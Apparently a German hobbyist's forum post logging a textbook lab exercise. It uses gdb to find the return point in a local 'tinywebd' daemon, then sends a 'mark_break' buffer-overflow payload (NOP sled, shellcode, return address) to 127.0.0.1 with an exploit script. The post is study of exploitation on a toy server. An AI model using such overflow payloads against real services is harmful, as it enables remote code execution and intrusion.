root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2958  0.0  0.0   2180   368 ?        Ss   18:37   0:00 ./tinywebd
root      2960  0.0  0.0   5924   840 pts/3    S+   18:38   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -pid=2958 --symbols=./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
Attaching to process 2958
Load new symbol table from "/home/tomovic/Dokumente/hack/tinywebd"? (y or n) n
Nicht bestätigt.
(gdb) x/5i main+533
   0x8048f5c <main+533>: inc    %esp
   0x8048f5d <main+534>: and    $0x8,%al
   0x8048f5f <main+536>: lea    0x28(%esp),%eax
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
(gdb)

Wo ist die Call Adresse ?

 

 

(gdb) x/5i main+540
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
   0x8048f6b <main+548>: mov    %eax,(%esp)
   0x8048f6e <main+551>: call   0x8048f75 <handle_connection>
   0x8048f73 <main+556>: jmp    0x8048f1a <main+467>
(gdb) break *0x8048f6e
Haltepunkt 1 at 0x8048f6e: file tinywebd.c, line 72.
(gdb) cont
Continuing.

Seite 376:

Breakpoint 1, 0x08048f6e in main () at tinywebd.c:72
72       handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp            0xbffff6d0 0xbffff6d0
ebx            0xb7fc5000 -1208201216
ebp            0xbffff728 0xbffff728
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff643 in ?? ()
(gdb) i r esp ebx ebp
esp            0xbffff6d0 0xbffff6d0
ebx            0x6 6
ebp            0xbffff524 0xbffff524
(gdb) x/5i main
   0x8048d47 <main>: push   %ebp
   0x8048d48 <main+1>: mov    %esp,%ebp
   0x8048d4a <main+3>: and    $0xfffffff0,%esp
   0x8048d4d <main+6>: sub    $0x50,%esp
   0x8048d50 <main+9>: movl   $0x1,0x48(%esp)
(gdb) x/5i main+540
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
   0x8048f6b <main+548>: mov    %eax,(%esp)
   0x8048f6e <main+551>: call   0x8048f75 <handle_connection>
   0x8048f73 <main+556>: jmp    0x8048f1a <main+467>

das andere Terminal

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark_break.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt.sh mark_break 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_break (44 bytes)
[NOP (356 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   
© ALLROUNDER